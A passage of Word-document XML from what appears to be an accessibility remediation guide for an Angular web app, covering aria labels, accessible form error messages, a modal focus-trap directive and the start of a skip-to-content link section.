            <w:tcW w:type="dxa" w:w="26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Notification bell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="436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aria-label="View notifications"</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navbar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Logout button</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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aria-label="Logout"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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family-members</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Edit member</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="436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aria-label="Edit family member"</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family-members</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Delete member</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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aria-label="Remove family member"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec8-2" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">8.2  Form Error Accessibility</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Current pattern (non-accessible):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;input id="policyHolderName" class="form-control" formControlName="policyHolderName"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;span class="form-error" *ngIf="..."&gt;Full name is required&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Corrected pattern:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;input</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    id="policyHolderName"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    class="form-control"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    formControlName="policyHolderName"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    [attr.aria-invalid]="policyForm.get('policyHolderName')?.invalid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        &amp;&amp; policyForm.get('policyHolderName')?.touched"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    aria-describedby="policyHolderName-error"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;span</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    id="policyHolderName-error"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    class="form-error"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    role="alert"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    *ngIf="policyForm.get('policyHolderName')?.invalid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        &amp;&amp; policyForm.get('policyHolderName')?.touched"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    Full name is required</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/span&gt;</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Apply this same pattern to ALL form fields in:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// policy-form.component.ts, register.component.ts, family-members.component.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec8-3" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">8.3  Modal Focus Trap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">New Directive: src/app/shared/directives/focus-trap.directive.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">import { Directive, ElementRef, HostListener, OnInit } from "@angular/core";</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@Directive({ selector: "[appFocusTrap]", standalone: true })</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">export class FocusTrapDirective implements OnInit {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    private focusableSelectors = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        "button:not([disabled])", "input:not([disabled])",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        "select:not([disabled])", "textarea:not([disabled])",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        "a[href]", "[tabindex]:not([tabindex='-1'])"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    ].join(", ");</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constructor(private el: ElementRef) {}</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ngOnInit() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        // Focus the first focusable element on open</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        const first = this.el.nativeElement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            .querySelectorAll(this.focusableSelectors)[0] as HTMLElement;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        first?.focus();</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@HostListener("keydown", ["$event"])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    onKeyDown(event: KeyboardEvent): void {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (event.key !== "Tab") return;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        const focusable = Array.from&lt;HTMLElement&gt;(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            this.el.nativeElement.querySelectorAll(this.focusableSelectors)</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const first = focusable[0];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        const last  = focusable[focusable.length - 1];</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if (event.shiftKey &amp;&amp; document.activeElement === first) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            event.preventDefault();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            last.focus();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        } else if (!event.shiftKey &amp;&amp; document.activeElement === last) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            event.preventDefault();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            first.focus();</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Add appFocusTrap to every modal-content div:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// &lt;div class="modal-content card-glass" appFocusTrap&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec8-4" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">8.4  Skip to Content Link</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">File: src/app/app.component.html — Add as first element in template</w:t>
      </w:r>
    </w:p>
